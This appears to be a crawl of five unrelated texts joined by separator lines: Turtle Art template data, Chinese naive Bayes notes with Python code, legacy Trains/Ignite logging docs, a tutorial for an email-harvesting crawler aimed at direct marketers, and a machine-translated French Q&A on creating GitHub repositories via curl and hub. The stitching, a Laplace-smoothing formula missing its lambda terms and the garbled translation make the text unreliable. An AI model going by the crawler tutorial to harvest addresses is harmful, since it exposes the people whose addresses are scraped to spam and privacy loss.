[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'penup', 0, 0, [8, 11]],
[11, 'setxy2', 0, 0, [10, 12, 13, 14]],
[12, 'leftx', 0, 0, [11, None]],
[13, 'topy', 0, 0, [11, None]],
[14, 'pendown', 0, 0, [11, 15]],
[15, 'setscale', 0, 0, [14, 16, 17]],
[16, ['number', '67'], 0, 0, [15, None]],
[17, 'list', 0, 0, [15, 18, 19, 20]],
[18, ['string', '∙ '], 0, 0, [17, None]],
[19, ['string', '∙ '], 0, 0, [17, None]],
[20, 'sandwichbottom', 0, 0, [17, None]]],
'picture1x1a':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'penup', 0, 0, [8, 11]],
[11, 'setxy2', 0, 0, [10, 12, 13, 14]],
[12, 'leftx', 0, 0, [11, None]],
[13, 'topy', 0, 0, [11, None]],
[14, 'pendown', 0, 0, [11, 15]],
[15, 'setscale', 0, 0, [14, 16, 17]],
[16, ['number', '90'], 0, 0, [15, None]],
[17, 'showaligned', 0, 0, [15, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'sandwichbottom', 0, 0, [17, None]]],
'picture2x2':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'journal', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'journal', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'journal', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture1x2':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'description', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'journal', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'description', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture2x1':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'journal', 0, 0, [24, None]],
[26, 'penup', 0, 0, [24, 27]],
[27, 'setxy2', 0, 0, [26, 28, 29, 30]],
[28, 'leftx', 0, 0, [27, None]],
[29, 'bottomy', 0, 0, [27, None]],
[30, 'pendown', 0, 0, [27, 31]],
[31, 'showaligned', 0, 0, [30, 32, 33]],
[32, 'description', 0, 0, [31, None]],
[33, 'penup', 0, 0, [31, 34]],
[34, 'setxy2', 0, 0, [33, 35, 36, 37]],
[35, 'rightx', 0, 0, [34, None]],
[36, 'bottomy', 0, 0, [34, None]],
[37, 'pendown', 0, 0, [34, 38]],
[38, 'showaligned', 0, 0, [37, 39, 40]],
[39, 'description', 0, 0, [38, None]],
[40, 'sandwichbottom', 0, 0, [38, None]]],
'picture1x1':
[[0, 'sandwichtop_no_label', 0, 0, [None, 1]],
[1, 'penup', 0, 0, [0, 2]],
[2, 'setxy2', 0, 0, [1, 3, 4, 5]],
[3, 'titlex', 0, 0, [2, None]],
[4, 'titley', 0, 0, [2, None]],
[5, 'pendown', 0, 0, [2, 6]],
[6, 'setscale', 0, 0, [5, 7, 8]],
[7, ['number', '100'], 0, 0, [6, None]],
[8, 'show', 0, 0, [6, 9, 10]],
[9, ['string', _('Title')], 0, 0, [8, None]],
[10, 'setscale', 0, 0, [8, 11, 12]],
[11, ['number', '35'], 0, 0, [10, None]],
[12, 'penup', 0, 0, [10, 13]],
[13, 'setxy2', 0, 0, [12, 14, 15, 16]],
[14, 'leftx', 0, 0, [13, None]],
[15, 'topy', 0, 0, [13, None]],
[16, 'pendown', 0, 0, [13, 17]],
[17, 'showaligned', 0, 0, [16, 18, 19]],
[18, 'journal', 0, 0, [17, None]],
[19, 'penup', 0, 0, [17, 20]],
[20, 'setxy2', 0, 0, [19, 21, 22, 23]],
[21, 'rightx', 0, 0, [20, None]],
[22, 'topy', 0, 0, [20, None]],
[23, 'pendown', 0, 0, [20, 24]],
[24, 'showaligned', 0, 0, [23, 25, 26]],
[25, 'description', 0, 0, [24, None]],
[26, 'sandwichbottom', 0, 0, [24, None]]],
'reskin':
[[0, 'skin', 0, 0, [None, 1, None]],
[1, 'journal', 0, 0, [0, None]]]}
|
笔记来自《统计学习方法》第四章。
大体分析
朴素贝叶斯的优缺点
优点:
朴素贝叶斯模型发源于古典数学理论,有着坚实的数学基础,以及稳定的分类效率。
NBC模型所需估计的参数很少,对缺失数据不太敏感,算法也比较简单。
缺点:
理论上,NBC模型与其他分类方法相比具有最小的误差率。但是实际上并非总是如此,这是因为NBC模型假设属性之间相互独立,这个假设在实际应用中往往是不成立的(可以考虑用聚类算法先将相关性较大的属性聚类),这给NBC模型的正确分类带来了一定影响。在属性个数比较多或者属性之间相关性较大时,NBC模型的分类效率比不上决策树模型。而在属性相关性较小时,NBC模型的性能最为良好。
需要知道先验概率。
分类决策存在错误率
朴素贝叶斯
联合概率分布
联合概率分布可以由先验概率和条件概率来得到:
$$ P(X,Y)=P(Y)P(X|Y) $$
也就是说,只要知道了先验概率分布$P(Y)$和条件概率分布$P(X|Y)$,就可以算出联合概率分布,而先验概率分布和条件概率分布可以由极大似然估计或者贝叶斯估计得出。
极大似然估计
极大似然估计就是通过事件发生的频率来估计事件发生的概率:
$$ \Large{{P(Y=c_k)=\frac{\sum_{i=1}^{N} I(y_i=c_k)}{N}}}\\ \Large{P(X^{(j)}=a_{jl}|Y=c_k)=\frac{\sum_{i=1}^{N} I(x_i^{(j)}=a_{jl},y_i=C_k)}{\sum_{i=1}^N I(y_i=c_k)}} $$
贝叶斯估计
由极大似然估计得到的概率,如果概率值为零的话,会影响到后验概率的计算(分母不能为零)
那么,在随机变量各个取值的频数上赋予一个正数$\lambda>0$,就可以避免这个问题:
$$ \Large{{P(Y=c_k)=\frac{\sum_{i=1}^{N} I(y_i=c_k)+\lambda}{N+K\lambda}}}\\ \Large{P(X^{(j)}=a_{jl}|Y=c_k)=\frac{\sum_{i=1}^{N} I(x_i^{(j)}=a_{jl},y_i=C_k)}{\sum_{i=1}^N I(y_i=c_k)}} $$
在这里,$\lambda=0$时为极大似然估计,$\lambda=1$时是拉普拉斯平滑,其中的一些参数是,$l=1,2,...,S_j$,$k=1,2,...,K$
朴素贝叶斯法
有了计算各个概率的方法之后,我们就可以去计算每一个$P(Y=c_k|X=x)$,然后取值最大的那个概率对应的$Y$作为预测的结果。
在学习的时候,我们需要模型去学习一个机制,使得$P(Y=c_k|X=x)$能够最大,这就确保了,当系统接收到一个输入样本$X=x$的时候,系统最可能给出正确的分类答案,即$Y=c_k$。
有极大似然估计或者贝叶斯估计,我们可以计算出$P(X=x|Y=c_k)$和$P(Y=c_k)$,那么我们怎么才能得到$P(Y=c_k|X=x)$呢?
由贝叶斯公式(或者贝叶斯定理),我们有:
$$ \Large{P(Y=c_k|X=x)=\frac{P(X=x|Y=c_k)P(Y=c_k)}{\sum_kP(X=x|Y=c_k)P(Y=c_k)}} $$
而我们知道,任何一个输入的样本都可以被表示为一个n维向量,那么条件概率分布:
$$ P(X=x|Y=c_k)=P(X^{(1)}=x^{(1)},...,X^{(n)}=x^{(n)}|Y=c_k),\ \ \ k=1,2,...,K $$
而在朴素贝叶斯法中,对条件概率分布做了__条件独立性__的假设,那么就有:
$$ \begin{align} \large{P(X=x|Y=c_k)=P(X^{(1)}=}&\large{x^{(1)},...,X^{(n)}=x^{(n)}|Y=c_k)}\\ \large{=}&\large{\prod_{j=1}^nP(X^{(i)}=x^{(i)}|Y=c_k)} \end{align} $$
于是乎:
$$ \Large{P(Y=c_k|X=x)=\frac{P(Y=c_k)\prod _jP(X^{(j)}=x^{(j)}|Y=c_k)}{\sum_kP(Y=c_k\prod_jP(X^{(j)}=x^{(j)}|Y=c_k)}} $$
省去不会变化的分母,朴素贝叶斯分类器可以表示为:
$$ \Large{y=\arg \max_{c_k}P(Y=c_k)\prod _jP(X^{(j)}=x^{(j)}|Y=c_k)} $$
也就是说,找到一个$y=c_k$,使得上式最大化即可,这个$y$就是分类器预测的结果。
例题
书中给出了两个例子:参数未修正、参数修正,两种场景的估计,都是三步走,一样的套路。
问题描述:
参数未修正:
第一步:类别信息
第二步:不同类别的特征信息
第三步:不同类别概率估计
参数修正:这里
第一步:类别信息
第二步:不同类别的特征信息
第三步:不同类别概率估计
Python 实现
import numpy as np
#构造NB分类器
def Train(X_train, Y_train, feature):
global class_num,label
class_num = 2 #分类数目
label = [1, -1] #分类标签
feature_len = 3 #特征长度
#构造3×2的列表
feature = [[1, 'S'],
[2, 'M'],
[3, 'L']]
prior_probability = np.zeros(class_num) # 初始化先验概率
conditional_probability = np.zeros((class_num,feature_len,2)) # 初始化条件概率
positive_count = 0 #统计正类
negative_count = 0 #统计负类
for i in range(len(Y_train)):
if Y_train[i] == 1:
positive_count += 1
else:
negative_count += 1
prior_probability[0] = positive_count / len(Y_train) #求得正类的先验概率
prior_probability[1] = negative_count / len(Y_train) #求得负类的先验概率
'''
conditional_probability是一个2*3*2的三维列表,第一维是类别分类,第二维和第三维是一个3*2的特征分类
'''
#分为两个类别
for i in range(class_num):
#对特征按行遍历
for j in range(feature_len):
#遍历数据集,并依次做判断
for k in range(len(Y_train)):
if Y_train[k] == label[i]: #相同类别
if X_train[k][0] == feature[j][0]:
conditional_probability[i][j][0] += 1
if X_train[k][1] == feature[j][1]:
conditional_probability[i][j][1] += 1
class_label_num = [positive_count, negative_count] #存放各类型的数目
for i in range(class_num):
for j in range(feature_len):
conditional_probability[i][j][0] = conditional_probability[i][j][0] / class_label_num[i] #求得i类j行第一个特征的条件概率
conditional_probability[i][j][1] = conditional_probability[i][j][1] / class_label_num[i] #求得i类j行第二个特征的条件概率
return prior_probability,conditional_probability
#给定数据进行分类
def Predict(testset, prior_probability, conditional_probability, feature):
result = np.zeros(len(label))
for i in range(class_num):
for j in range(len(feature)):
if feature[j][0] == testset[0]:
conditionalA = conditional_probability[i][j][0]
if feature[j][1] == testset[1]:
conditionalB = conditional_probability[i][j][1]
result[i] = conditionalA * conditionalB * prior_probability[i]
result = np.vstack([result,label])
return result
def main():
X_train = [[1, 'S'], [1, 'M'], [1, 'M'], [1, 'S'], [1, 'S'],
[2, 'S'], [2, 'M'], [2, 'M'], [2, 'L'], [2, 'L'],
[3, 'L'], [3, 'M'], [3, 'M'], [3, 'L'], [3, 'L']]
Y_train = [-1, -1, 1, 1, -1, -1, -1, 1, 1, 1, 1, 1, 1, 1, -1]
#构造3×2的列表
feature = [[1, 'S'],
[2, 'M'],
[3, 'L']]
testset = [2, 'S']
prior_probability, conditional_probability= Train(X_train, Y_train, feature)
result = Predict(testset, prior_probability, conditional_probability, feature)
print(result)
if __name__ == '__main__':
main()
本文由 mmmwhy 创作,最后编辑时间为: Sep 17, 2018 at 11:08 am
|
PyTorch Ignite
Trains is now ClearML
This documentation applies to the legacy Trains versions. For the latest documentation, see ClearML.
To install Trains:
pip install trains
By default, Trains works with our demo Trains Server (https://demoapp.trains.allegro.ai/dashboard). You can deploy a self-hosted Trains Server, see the Deploying Trains Overview, and configure Trains to meet your requirements, see the Trains Configuration Reference page.
Ignite TrainsLogger
Integrate Trains by creating an Ignite TrainsLogger object. When the code runs, it connects to the Trains backend, and creates a Task (experiment) in Trains.
from ignite.contrib.handlers.trains_logger import *
trains_logger = TrainsLogger(project_name="examples", task_name="ignite")
Later in the code, attach any of the Trains handlers to the TrainsLogger object.
For example, attach the OutputHandler and log training loss at each iteration:
trains_logger.attach(trainer,
log_handler=OutputHandler(tag="training",
output_transform=lambda loss: {"loss": loss}),
event_name=Events.ITERATION_COMPLETED)
TrainsLogger parameters
The TrainsLogger method parameters are the following:
project_name(optional[str]) – The name of the project in which the experiment will be created. If the project does not exist, it is created. Ifproject_nameisNone, the repository name becomes the project name.
task_name(optional[str]) – The name of Task (experiment). Iftask_nameisNone, the Python experiment script’s file name becomes the Task name.
task_type(optional[str]) – The name of the experiment. The default istraining.
The
task_typevalues include:
TaskTypes.training(default)
TaskTypes.train
TaskTypes.testing
TaskTypes.inference
report_freq(optional[int]) – The histogram processing frequency (handles histogram values every X calls to the handler). AffectsGradsHistHandlerandWeightsHistHandler. Default value is100.
histogram_update_freq_multiplier(optional[int]) – The histogram report frequency (report first X histograms and once every X reports afterwards). Default value is10.
histogram_granularity(optional[int]): Optional. Histogram sampling granularity. Default is50.
Visualizing experiment results
After creating an Ignite TrainsLogger object and attaching handlers in trains_logger.py, when the code runs, you can visualize the experiment results in the Trains Web-App (UI).
Scalars
For example, run the Ignite MNIST example for TrainsLogger, mnist_with_trains_logger.py.
To log scalars, use OutputHandler.
trains_logger.attach(
trainer,
log_handler=OutputHandler(
tag="training", output_transform=lambda loss: {"batchloss": loss}, metric_names="all"
),
event_name=Events.ITERATION_COMPLETED(every=100),
)
trains_logger.attach(
train_evaluator,
log_handler=OutputHandler(tag="training", metric_names=["loss", "accuracy"],
another_engine=trainer),
event_name=Events.EPOCH_COMPLETED,
)
View the scalars in the Trains Web-App (UI), RESULTS tab, SCALARS sub-tab, view training and validation metrics.
trains_logger.attach(
validation_evaluator,
log_handler=OutputHandler(tag="validation", metric_names=["loss", "accuracy"],
another_engine=trainer),
event_name=Events.EPOCH_COMPLETED,
)
Model snapshots
To save model snapshots, use TrainsServer.
handler = Checkpoint(
{"model": model},
TrainsSaver(trains_logger, dirname="~/.trains/cache/"),
n_saved=1,
score_function=lambda e: 123,
score_name="acc",
filename_prefix="best",
global_step_transform=global_step_from_engine(trainer),
)
View saved snapshots in the Trains Web-App (UI), ARTIFACTS tab.
To view the model, in the ARTIFACTS tab, click the model name (or download it).
Logging
Ignite engine output and / or metrics
To log the Ignite engine's output and / or metrics, use the OutputHandler handler.
For example, log training loss at each iteration.
# Attach the logger to the trainer to log training loss at each iteration
trains_logger.attach(trainer,
log_handler=OutputHandler(tag="training",
output_transform=lambda loss: {"loss": loss}),
event_name=Events.ITERATION_COMPLETED)
Log metrics for training.
# Attach the logger to the evaluator on the training dataset and log NLL, Accuracy metrics after each epoch
# We setup `global_step_transform=global_step_from_engine(trainer)` to take the epoch
# of the `trainer` instead of `train_evaluator`.
trains_logger.attach(train_evaluator,
log_handler=OutputHandler(tag="training",
metric_names=["nll", "accuracy"],
global_step_transform=global_step_from_engine(trainer)),
event_name=Events.EPOCH_COMPLETED)
Log metrics for validation.
# Attach the logger to the evaluator on the validation dataset and log NLL, Accuracy metrics after
# each epoch. We setup `global_step_transform=global_step_from_engine(trainer)` to take the epoch of the
# `trainer` instead of `evaluator`.
trains_logger.attach(evaluator,
log_handler=OutputHandler(tag="validation",
metric_names=["nll", "accuracy"],
global_step_transform=global_step_from_engine(trainer)),
event_name=Events.EPOCH_COMPLETED)
Optimizer parameters
To log optimizer parameters, use the OptimizerParamsHandler handler.
# Attach the logger to the trainer to log optimizer's parameters, e.g. learning rate at each iteration
trains_logger.attach(trainer,
log_handler=OptimizerParamsHandler(optimizer),
event_name=Events.ITERATION_STARTED)
Model weights
To log model weights as scalars, use the WeightsScalarHandler handler.
# Attach the logger to the trainer to log model's weights norm after each iteration
trains_logger.attach(trainer,
log_handler=WeightsScalarHandler(model, reduction=torch.norm),
event_name=Events.ITERATION_COMPLETED)
To log model weights as histograms, use the WeightsHistHandler handler.
# Attach the logger to the trainer to log model's weights norm after each iteration
trains_logger.attach(trainer,
log_handler=WeightsHistHandler(model),
event_name=Events.ITERATION_COMPLETED)
Model snapshots
To save input snapshots as Trains artifacts, use TrainsSaver.
to_save = {"model": model}
handler = Checkpoint(to_save, TrainsSaver(trains_logger), n_saved=1,
score_function=lambda e: 123, score_name="acc",
filename_prefix="best",
global_step_transform=global_step_from_engine(trainer))
validation_evaluator.add_event_handler(Events.EVENT_COMPLETED, handler)
MNIST example
The ignite repository contains an MNIST TrainsLogger example, mnist_with_trains_logger.py.
When you run this code, visualize the experiment results in the Trains Web-App (UI), see Visualizing experiment results.
|
I often receive requests asking about email crawling. It is evident that this topic is quite interesting for those who want to scrape contact information from the web (like direct marketers), and previously we have already mentioned GSA Email Spider as an off-the-shelf solution for email crawling. In this article I want to demonstrate how easy it is to build a simple email crawler in Python. This crawler is simple, but you can learn many things from this example (especially if you’re new to scraping in Python).
I purposely simplified the code as much as possible to distill the main idea and allow you to add any additional features by yourself later if necessary. However, despite its simplicity, the code is fully functional and is able to extract for you many emails from the web. Note also that this code is written on Python 3.
Ok, let’s move from words to deeds. I’ll consider it portion by portion, commenting on what’s going on. If you need the whole code you can get it at the bottom of the post.
Jump to the full-code.
Let’s import all necessary libraries first. In this example I use BeautifulSoup and Requests as third party libraries and urllib, collections and re as built-in libraries. BeautifulSoup provides a simple way for searching an HTML document, and the Request library allows you to easily perform web requests.
from bs4 import BeautifulSoup
import requests
import requests.exceptions
from urllib.parse import urlsplit
from collections import deque
import re
The following piece of code defines a list of urls to start the crawling from. For an example I chose “The Moscow Times” website, since it exposes a nice list of emails. You can add any number of urls that you want to start the scraping from. Though this collection could be a list (in Python terms), I chose a deque type, since it better fits the way we will use it:
# a queue of urls to be crawled
new_urls = deque(['http://www.themoscowtimes.com/contact_us/'])
Next, we need to store the processed urls somewhere so as not to process them twice. I chose a set type, since we need to keep unique values and be able to search among them:
# a set of urls that we have already crawled
processed_urls = set()
In the emails collection we will keep the collected email addresses:
# a set of crawled emails
emails = set()
Let’s start scraping. We’ll do it until we don’t have any urls left in the queue. As soon as we take a url out of the queue, we will add it to the list of processed urls, so that we do not forget about it in the future:
# process urls one by one until we exhaust the queue
while len(new_urls):
# move next url from the queue to the set of processed urls
url = new_urls.popleft()
processed_urls.add(url)
Then we need to extract some base parts of the current url; this is necessary for converting relative links found in the document into absolute ones:
# extract base url and path to resolve relative links
parts = urlsplit(url)<br >base_url = "{0.scheme}://{0.netloc}".format(parts)
path = url[:url.rfind('/')+1] if '/' in parts.path else url
The following code gets the page content from the web. If it encounters an error it simply goes to the next page:
# get url's content
print("Processing %s" % url)
try:
response = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError):
# ignore pages with errors
continue
When we have gotten the page, we can search for all new emails on it and add them to our set. For email extraction I use a simple regular expression for matching email addresses:
# extract all email addresses and add them into the resulting set
new_emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", response.text, re.I))
emails.update(new_emails)
After we have processed the current page, let’s find links to other pages and add them to our url queue (this is what the crawling is about). Here I use the BeautifulSoup library for parsing the page’s html:
# create a beutiful soup for the html document
soup = BeautifulSoup(response.text)
The find_all method of this library extracts page elements according to the tag name (<a> in our case):
# find and process all the anchors in the document
for anchor in soup.find_all("a"):
Some of <a> tags may not contain a link at all, so we need to take this into consideration:
# extract link url from the anchor
link = anchor.attrs["href"] if "href" in anchor.attrs else ''
If the link address starts with a hash, then we count it as a relative link, and it is necessary to add the base url to the beginning of it:
# add base url to relative links
if link.startswith('/'):
link = base_url + link
Now, if we have gotten a valid link (starting with “http”) and we don’t have it in our url queue, and we haven’t processed it before, then we can add it to the queue for further processing:
# add the new url to the queue if it's of HTTP protocol, not enqueued and not processed yet
if link.startswith('http') and not link in new_urls and not link in processed_urls:
new_urls.append(link)
A Simple Email Crawler (full code)
from bs4 import BeautifulSoup
import requests
import requests.exceptions
from urllib.parse import urlsplit
from collections import deque
import re
# a queue of urls to be crawled
new_urls = deque(['http://www.themoscowtimes.com/contact_us/index.php'])
# a set of urls that we have already crawled
processed_urls = set()
# a set of crawled emails
emails = set()
# process urls one by one until we exhaust the queue
while len(new_urls):
# move next url from the queue to the set of processed urls
url = new_urls.popleft()
processed_urls.add(url)
# extract base url to resolve relative links
parts = urlsplit(url)
base_url = "{0.scheme}://{0.netloc}".format(parts)
path = url[:url.rfind('/')+1] if '/' in parts.path else url
# get url's content
print("Processing %s" % url)
try:
response = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError):
# ignore pages with errors
continue
# extract all email addresses and add them into the resulting set
new_emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", response.text, re.I))
emails.update(new_emails)
# create a beutiful soup for the html document
soup = BeautifulSoup(response.text)
# find and process all the anchors in the document
for anchor in soup.find_all("a"):
# extract link url from the anchor
link = anchor.attrs["href"] if "href" in anchor.attrs else ''
# resolve relative links
if link.startswith('/'):
link = base_url + link
elif not link.startswith('http'):
link = path + link
# add the new url to the queue if it was not enqueued nor processed yet
if not link in new_urls and not link in processed_urls:
new_urls.append(link)
This crawler is simple and is deficient in several features (like saving found emails into a file), but it gives you some basic principles of email crawling. I give it to you for further improvement.
sessions,
cookiesand
auth tokenin the
requestslibrary in Python, please refer to here.
And of course, if you have any questions, suggestions or corrections feel free to comment on this post below.
Have a nice day!
|
J’ai créé un nouveau référentiel Git local:
~$ mkdir projectname ~$ cd projectname ~$ git init ~$ touch file1 ~$ git add file1 ~$ git commit -m 'first commit'
Existe-t-il une commande git permettant de créer un nouveau référentiel distant et d’envoyer mon commit vers GitHub d’ici? Je sais que ce n’est pas grave de lancer un navigateur et de créer un nouveau référentiel , mais s’il y a un moyen d’y parvenir depuis la CLI, je serais ravi.
J’ai lu une grande quantité d’articles mais aucun que j’ai trouvé ne mentionne comment créer un repository à distance à partir de l’interface de ligne de commande à l’aide des commandes git. Le bel article de Tim Lucas La configuration d’un nouveau repository git distant est la plus proche que j’ai trouvée, mais GitHub ne fournit pas d’access au shell .
Vous pouvez créer un repo GitHub via la ligne de commande à l’aide de l’API GitHub. Découvrez l’ API du référentiel . Si vous faites défiler environ un tiers du chemin, vous verrez une section intitulée “Créer” qui explique comment créer un repo via l’API (juste au-dessus, il y a une section qui explique comment utiliser un repo avec l’API) ). De toute évidence, vous ne pouvez pas utiliser git pour cela, mais vous pouvez le faire via la ligne de commande avec un outil tel que curl .
En dehors de l’API, il n’y a aucun moyen de créer un repository sur GitHub via la ligne de commande. Comme vous l’avez noté, GitHub n’autorise pas l’access au shell, etc. En plus de l’API GitHub, l’interface Web de GitHub est la seule façon de créer un repository.
Commandes CLI pour github API v3 (remplacez tous les mots clés CAPS):
curl -u 'USER' https://api.github.com/user/repos -d '{"name":"REPO"}' # Remember replace USER with your username and REPO with your repository/application name! git remote add origin git@github.com:USER/REPO.git git push origin master
Cela peut être fait avec trois commandes:
curl -u 'nyeates' https://api.github.com/user/repos -d '{"name":"projectname","description":"This project is a test"}' git remote add origin git@github.com:nyeates/projectname.git git push origin master
(mis à jour pour l’API Github v3)
curl -u 'nyeates' https://api.github.com/user/repos -d '{"name":"projectname","description":"This project is a test"}'
git remote add origin git@github.com:nyeates/projectname.git
git push origin master
Si vous installez l’ excellent outil Hub de defunkt , cela devient aussi simple que
git create
Dans les mots de l’auteur, ” hub est un wrapper de ligne de commande pour git qui vous rend meilleur à GitHub. ”
Étapes simples (en utilisant git + hub => GitHub ):
Installer le hub ( GitHub ).
brew install hub go get github.com/github/hub
sinon (avoir aussi bien aller ):
git clone https://github.com/github/hub.git && cd hub && ./script/build
Accédez à votre repository ou créez-en un vide: mkdir foo && cd foo && git init .
Run: hub create , il vous posera des questions sur les informations d’identification GitHub pour la première fois.
Utilisation: hub create [-p] [-d DESCRIPTION] [-h HOMEPAGE] [NAME]
Exemple: hub create -d Description -h example.com org_name/foo_repo
Hub demandera le nom d’utilisateur et le mot de passe GitHub la première fois qu’il doit accéder à l’API et l’échanger contre un jeton
OAuth, qu’il enregistre dans~/.config/hub.
Pour nommer explicitement le nouveau référentiel, saisissez
NAME, éventuellement sous la formeORGANIZATION/NAMEpour créer sous une organisation dont vous êtes membre.
Avec
-p, créez un référentiel privé et avec-det-hdéfinissez respectivement la description du référentiel et l’URLpage d’accueil.
Pour éviter d’être invité, utilisez les variables d’environnement
GITHUB_USERetGITHUB_PASSWORD.
Ensuite, validez et poussez comme d’habitude ou vérifiez la hub commit / hub push .
Pour plus d’aide, exécutez: hub help .
Voir aussi: Importation d’un référentiel Git à l’aide de la ligne de commande de GitHub.
Il y a un bijou officiel de github qui, je pense, le fait. J’essaierai d’append plus d’informations lorsque j’apprendrai, mais je ne fais que découvrir ce bijou, je ne sais pas encore grand chose.
MISE À JOUR: Après avoir configuré ma clé API, je suis capable de créer un nouveau repository sur github via la commande create , mais je ne peux pas utiliser la commande create-from-local , qui est censée prendre le repo local actuel et créer une correspondant à distance sur github.
$ gh create-from-local => error creating repository
Si quelqu’un a des idées à ce sujet, j’aimerais savoir ce que je fais mal. Il y a déjà un problème déposé .
